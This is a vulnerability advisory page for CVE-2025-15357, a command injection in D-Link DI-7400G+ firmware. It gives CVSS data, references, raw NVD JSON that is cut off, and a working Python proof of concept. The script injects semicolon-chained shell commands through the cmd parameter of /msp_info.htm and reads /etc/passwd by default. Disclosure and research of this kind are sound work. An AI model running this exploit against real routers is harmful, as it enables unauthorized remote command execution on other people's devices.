CVE-2025-15357

Description

A vulnerability was found in D-Link DI-7400G+ 19.12.25A1. This affects an unknown function of the file /msp_info.htm?flag=cmd. The manipulation of the argument cmd results in command injection. The attack can be launched remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:dlink:di-7400g\+_firmware:19.12.25a1:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:dlink:di-7400g\+:a1:*:*:*:*:*:*:* - NOT VULNERABLE

D-Link DI-7400G+ 固件版本 19.12.25A1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15357 PoC - D-Link DI-7400G+ Command Injection
# Target: /msp_info.htm?flag=cmd

def exploit(target_ip, target_port=80, cmd='cat /etc/passwd'):
    """
    Exploit command injection vulnerability in D-Link DI-7400G+
    
    Args:
        target_ip: Target device IP address
        target_port: Target web interface port (default: 80)
        cmd: Command to execute on target system
    
    Returns:
        Response text from the vulnerable endpoint
    """
    base_url = f"http://{target_ip}:{target_port}"
    
    # Construct malicious URL with command injection payload
    # Using semicolon to chain commands
    injection_payload = f";{cmd}"
    
    params = {
        'flag': 'cmd',
        'cmd': injection_payload
    }
    
    try:
        # Send HTTP GET request to vulnerable endpoint
        response = requests.get(
            f"{base_url}/msp_info.htm",
            params=params,
            timeout=10
        )
        
        print(f"[*] Target: {target_ip}:{target_port}")
        print(f"[*] Payload: {injection_payload}")
        print(f"[*] Status Code: {response.status_code}")
        print("\n[+] Response:")
        print(response.text)
        
        return response.text
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [cmd]")
        print(f"Example: python {sys.argv[0]} 192.168.1.1 'cat /etc/passwd'")
        sys.exit(1)
    
    target = sys.argv[1]
    command = sys.argv[2] if len(sys.argv) > 2 else 'cat /etc/passwd'
    
    exploit(target, 80, command)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15357
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15357
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15357/
[4] VulDB https://vuldb.com/cve/CVE-2025-15357
[5] https://github.com/xyh4ck/iot_poc/tree/main/D-Link_DI_7400G%2B_Command_Injection
[6] https://vuldb.com/?ctiid.338743
[7] https://vuldb.com/?id.338743
[8] https://vuldb.com/?submit.726376
[9] https://www.dlink.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15357", "sourceIdentifier": "[email protected]", "published": "2025-12-30T21:15:43.677", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in D-Link DI-7400G+ 19.12.25A1. This affects an unknown function of the file /msp_info.htm?flag=cmd. The manipulation of the argument cmd results in command injection. The attack can be launched remotely. The exploit has been made public and could be used."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en D-Link DI-7400G+ 19.12.25A1. Esto afecta una función desconocida del archivo /msp_info.htm?flag=cmd. La manipulación del argumento cmd resulta en inyección de comandos. El ataque puede lanzarse de forma remota. El exploit se ha hecho público y podría ser usado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:di-7400g\\+_firmware:19.12.25a1:*:*:*:*:*:*:*", "matchCriteriaId": "79DC3EDC-5CAC-4B65-8AF2-50CFC3AEF146"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:di-7400g\\+:a1:*:*:*:*:*:*:*", "matchCriteriaId": "8AC8863C-DDFF-40BA-AB5A-6BC574FB9089"}]}]}], "references": [{"url": "https://github.com/xyh4ck/iot_poc/tree/main/D-Link_DI_7400G%2B_Command_Injection", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338743", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338743", "source": "[email protected]", "tags": ["Third Party Advisory", ... (truncated)